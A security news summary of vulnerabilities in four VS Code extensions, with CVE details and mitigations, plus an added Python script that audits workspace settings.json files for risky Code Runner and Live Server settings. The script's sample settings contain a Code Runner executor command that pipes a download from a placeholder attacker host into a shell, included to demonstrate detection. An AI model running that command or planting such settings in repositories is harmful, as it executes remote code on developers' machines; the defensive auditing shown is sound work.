Researchers at OX Security disclosed multiple security vulnerabilities in four popular Microsoft Visual Studio Code extensions (Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview) that can let attackers read local files and execute code remotely. The four extensions have more than 125 million combined installs, and OX Security warns that a single malicious or vulnerable extension can give an attacker a foothold for lateral movement and full organizational compromise. Developers should remove untrusted extensions, avoid applying untrusted configurations (such as a settings.json from a source they do not control), keep extensions updated, and harden localhost and network settings.
Key points
- Multiple flaws were found in Live Server, Code Runner, Markdown Preview Enhanced, and Microsoft Live Preview.
- The extensions have been installed over 125 million times, amplifying the potential impact.
- CVE-2025-65717 in Live Server (CVSS 9.1) lets an attacker read and exfiltrate local files through the extension's development server on localhost:5500.
- CVE-2025-65716 in Markdown Preview Enhanced (CVSS 8.8) allows arbitrary JavaScript execution when a crafted .md file is previewed, and CVE-2025-65715 in Code Runner enables code execution through a manipulated settings.json.
- Mitigations include uninstalling or disabling untrusted extensions, avoiding untrusted configurations, updating extensions, restricting localhost and network access, and turning off localhost services when not in use.
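The "avoid untrusted configurations" mitigation is hard to act on without a way to see what a repository's workspace settings would make an extension do. The script below is an added example written for this summary; it is not code from OX Security, The Hacker News, or the extension projects. It parses a workspace `.vscode/settings.json` (VS Code reads it as JSON with comments, so comments and trailing commas are stripped first) and flags two things: Code Runner executor maps, whose values are shell command templates the extension will run, and a Live Server host setting that binds the development server beyond loopback. The setting names (`code-runner.executorMap*`, `liveServer.settings.host`) are the extensions' configuration keys as this example assumes them, and the sample settings file is constructed for the demonstration; the `attacker.example` URL in it is a placeholder.

```python
"""Audit a workspace .vscode/settings.json for keys that let a cloned
repository change what VS Code extensions execute or expose.

Added example for this summary, not OX Security's or the extensions' code.
Assumed extension setting names: code-runner.executorMap,
code-runner.executorMapByGlob, code-runner.executorMapByFileExtension,
liveServer.settings.host.
"""
import json
import re
import sys
from pathlib import Path

# Code Runner keys whose values are shell command templates (assumed names).
COMMAND_KEYS = (
    "code-runner.executorMap",
    "code-runner.executorMapByGlob",
    "code-runner.executorMapByFileExtension",
)

# Constructed sample of a workspace settings.json a repository might ship.
SAMPLE_WORKSPACE_SETTINGS = r'''{
  // looks like harmless project config
  "editor.tabSize": 2,
  "code-runner.executorMap": {
    "python": "curl -s http://attacker.example/p | sh; python -u",
  },
  "liveServer.settings.host": "0.0.0.0",
}'''


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments (outside strings) and trailing commas,
    so the JSON-with-comments VS Code accepts can be parsed by json."""
    out = []
    i, n = 0, len(text)
    in_str = False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def audit_settings(settings: dict) -> list[str]:
    """Return one warning per setting that changes what an extension runs
    or where it listens."""
    findings: list[str] = []
    for key in COMMAND_KEYS:
        mapping = settings.get(key)
        if isinstance(mapping, dict):
            for lang, cmd in mapping.items():
                findings.append(f"{key}[{lang}] would run: {cmd}")
    host = settings.get("liveServer.settings.host")
    if isinstance(host, str) and host not in ("127.0.0.1", "localhost", "::1"):
        findings.append(
            f"liveServer.settings.host={host} binds the dev server beyond loopback")
    return findings


def audit_text(text: str) -> list[str]:
    return audit_settings(json.loads(strip_jsonc(text)))


def audit_workspace(root: str = ".") -> list[str]:
    """Audit <root>/.vscode/settings.json; an absent file yields no findings."""
    path = Path(root) / ".vscode" / "settings.json"
    if not path.is_file():
        return []
    return audit_text(path.read_text(encoding="utf-8"))


if __name__ == "__main__":
    # Usage: python audit_vscode_settings.py [workspace-dir]
    # Without an argument the constructed sample is audited.
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_workspace(target) if target else audit_text(SAMPLE_WORKSPACE_SETTINGS)
    for line in results:
        print("WARN", line)
    sys.exit(1 if results else 0)
```

Run it against a freshly cloned repository before opening the folder in VS Code, or wire it into a pre-open hook; a non-zero exit means the workspace settings would change what Code Runner executes or expose Live Server on a non-loopback address. Clearing the flagged keys, or opening the folder in VS Code's Restricted Mode so workspace settings are not applied, addresses the finding.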
Read More: https://thehackernews.com/2026/02/critical-flaws-found-in-four-vs-code.html